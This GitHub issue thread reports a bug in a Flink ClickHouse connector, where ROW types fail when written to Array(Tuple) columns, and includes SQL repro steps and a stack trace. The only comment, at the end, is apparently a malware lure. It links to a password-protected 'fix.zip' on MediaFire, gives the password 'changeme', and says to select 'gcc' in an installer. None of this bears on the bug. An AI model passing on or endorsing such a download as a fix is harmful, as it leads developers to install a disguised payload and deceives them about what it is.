### ISSUE TITLE
[Bug]:  Flink Logical Type ROW is not supported for Array<Tuple> clickhouse type

### ISSUE THREAD

**Issue by qingfei1994** [itinycheng/flink-connector-clickhouse#154]
### What happened?

Clickhouse connector doesn't support Flink Logical Type ROW when I'm trying to ingest a nested Row into 
Array(Tuple)

```
Caused by: java.lang.UnsupportedOperationException: Unsupported type:ROW<`a` INT, `b` INT, `c` INT>
	at org.apache.flink.connector.clickhouse.internal.converter.ClickHouseConverterUtils.toExternal(ClickHouseConverterUtils.java:118)
	at org.apache.flink.connector.clickhouse.internal.converter.ClickHouseConverterUtils.toExternal(ClickHouseConverterUtils.java:96)
```

### Affects Versions

master

### How to reproduce

create a clickhouse table with flatten_nested=0 and Array(Tuple) column
```
set flatten_nested=0;
create table test_tuple3(arr Array(Tuple(a Int32, b Int32, c Int32)), z Int32) Engine=MergeTree() Order By tuple();
```

Flink SQL

```
 CREATE TABLE test_tuple (
    arr Array<Row<a int,b int,c int>>,
    z int
  ) WITH (
    'connector' = 'clickhouse',
    'url' = '......',
    'database-name' = 'default',
    'table-name' = 'test_tuple3',
  .....
  );
  insert into test_tuple values(Array[(1,2,3)],600);
```

Got below error:
```
java.lang.UnsupportedOperationException: Unsupported type:ROW<`a` INT, `b` INT, `c` INT>
	at org.apache.flink.connector.clickhouse.internal.converter.ClickHouseConverterUtils.toExternal(ClickHouseConverterUtils.java:118)
	at org.apache.flink.connector.clickhouse.internal.converter.ClickHouseConverterUtils.toExternal(ClickHouseConverterUtils.java:96)
	at org.apache.flink.connector.clickhouse.internal.converter.ClickHouseRowConverter.lambda$createToExternalConverter$e45b375b$1(ClickHouseRowConverter.java:228)
	at org.apache.flink.connector.clickhouse.internal.converter.ClickHouseRowConverter.toExternal(ClickHouseRowConverter.java:95)
	at org.apache.flink.connector.clickhouse.internal.executor.ClickHouseBatchExecutor.addToBatch(ClickHouseBatchExecutor.java:80)
	at org.apache.flink.connector.clickhouse.internal.ClickHouseBatchOutputFormat.writeRecord(ClickHouseBatchOutputFormat.java:97)
	at org.apache.flink.connector.clickhouse.internal.ClickHouseBatchOutputFormat.writeRecord(ClickHouseBatchOutputFormat.java:33)
	at org.apache.flink.streaming.api.functions.sink.OutputFormatSinkFunction.invoke(OutputFormatSinkFunction.java:104)
	at org.apache.flink.streaming.api.functions.sink.SinkFunction.invoke(SinkFunction.java:50)
	at org.apache.flink.table.runtime.operators.sink.SinkOperator.processElement(SinkOperator.java:65)
	at org.apache.flink.streaming.runtime.tasks.ChainingOutput.pushToOperator(ChainingOutput.java:94)
	at org.apache.flink.streaming.runtime.tasks.ChainingOutput.collect(ChainingOutput.java:75)
	at org.apache.flink.streaming.runtime.tasks.ChainingOutput.collect(ChainingOutput.java:39)
	at BatchExecCalc$6.processElement(Unknown Source)
```

### Are you willing to submit a PR?

- [X] Yes I am willing to submit a PR!

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."
